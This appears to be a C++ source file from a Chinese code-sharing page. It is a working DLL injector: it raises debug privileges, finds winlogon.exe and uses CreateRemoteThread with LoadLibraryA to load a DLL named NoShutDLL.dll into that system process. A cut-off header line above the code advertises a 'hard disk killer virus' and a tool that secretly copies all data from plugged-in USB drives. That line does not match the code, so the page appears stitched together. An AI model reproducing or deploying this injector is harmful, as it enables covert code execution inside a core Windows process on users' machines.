main.cpp

硬盘杀手病毒技术详细特征 [shief.rar] - 这是一个可以在后台偷取你闪盘里所有资料的小软件。 只要你的闪盘(如U盘,mp3)一插上

#define EXENAME "winlogon.exe"
#define DLLNAME "C:\\NoShutDLL.dll"
//作者Flyue qq: 406088125 转载时请注明
#include <windows.h>
#include <stdio.h>
#include <TLHELP32.H>

DWORD ProcessNameToPId(LPCTSTR lpszProcess);
BOOL UpPrivilege(HANDLE hprocess, LPCTSTR lpname);


BOOL UpPrivilege(HANDLE hprocess, LPCTSTR lpname) //提升进程权限 debug
{
    HANDLE hToken;
    TOKEN_PRIVILEGES Privileges;
    LUID luid;
    OpenProcessToken(hprocess, TOKEN_ADJUST_PRIVILEGES, &hToken);
    Privileges.PrivilegeCount = 1;
    LookupPrivilegeValue(NULL, lpname, &luid);
    Privileges.Privileges[0].Luid = luid;
    Privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if(AdjustTokenPrivileges(hToken, FALSE, &Privileges, NULL, NULL, NULL)!=0)
        return TRUE;
    return FALSE;
}

int APIENTRY WinMain(HINSTANCE hInstance,
					 HINSTANCE hPrevInstance,
					 LPSTR	 lpCmdLine,
					 int	   nCmdShow)
{
	CopyFile("NoShut.dll", DLLNAME, FALSE);
	char privilege[] = SE_DEBUG_NAME;
    HANDLE hprocess;
    hprocess = GetCurrentProcess(); 
    if(!UpPrivilege(hprocess, privilege))  //开始提权
    {
		MessageBox(0, "UpPrivilege Error!", 0, MB_OK | MB_ICONERROR);
        return 1;
    }
	
	char File_Name[MAX_PATH] = {0};
	sprintf(File_Name, "%s", EXENAME);
	
	
	DWORD ProcessPid = ProcessNameToPId(File_Name);   //从进程名字获取 进程PID
	
	if(ProcessPid == 0)
	{
		MessageBox(0, "Not Find This File", 0, MB_OK | MB_ICONERROR);
		return 1;
	}
	
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessPid);
	
	
	DWORD dwSize;
	char DllName[MAX_PATH];
	sprintf(DllName, "%s", DLLNAME);

	dwSize = strlen(DllName);
	LPVOID lpBuf = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
	if(lpBuf == NULL)
	{
		MessageBox(0, "VirtualAllocEx Error", 0, MB_OK | MB_ICONERROR);
		CloseHandle(hProcess);
		return 1;
	}
	
	if(!WriteProcessMemory(hProcess, lpBuf, DllName, dwSize, NULL))    
	{
		MessageBox(0, "WriteProcessMemory Error", 0, MB_OK | MB_ICONERROR);
		CloseHandle(hProcess);
		return 1;
	}
	
	LPVOID pFunc = LoadLibraryA;
    HANDLE hThread = CreateRemoteThread(hProcess,
		NULL,
		0,
		(LPTHREAD_START_ROUTINE)pFunc,
		lpBuf,
		0,
		NULL);

	MessageBox(0, "Success!", "OK", MB_OK | MB_ICONINFORMATION);
	return 0;
}



DWORD ProcessNameToPId(LPCTSTR lpszProcess)
{
	
	HANDLE tlhelp = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	PROCESSENTRY32 pe32;
	pe32.dwSize = sizeof(PROCESSENTRY32);
	
	if(!Process32First(tlhelp, &pe32))
		return 0;
	
    while(Process32Next(tlhelp, &pe32))
	{
		if(!strcmp(pe32.szExeFile, lpszProcess))
		{
			return pe32.th32ProcessID;
			break;
		}
	}
    return 0;
}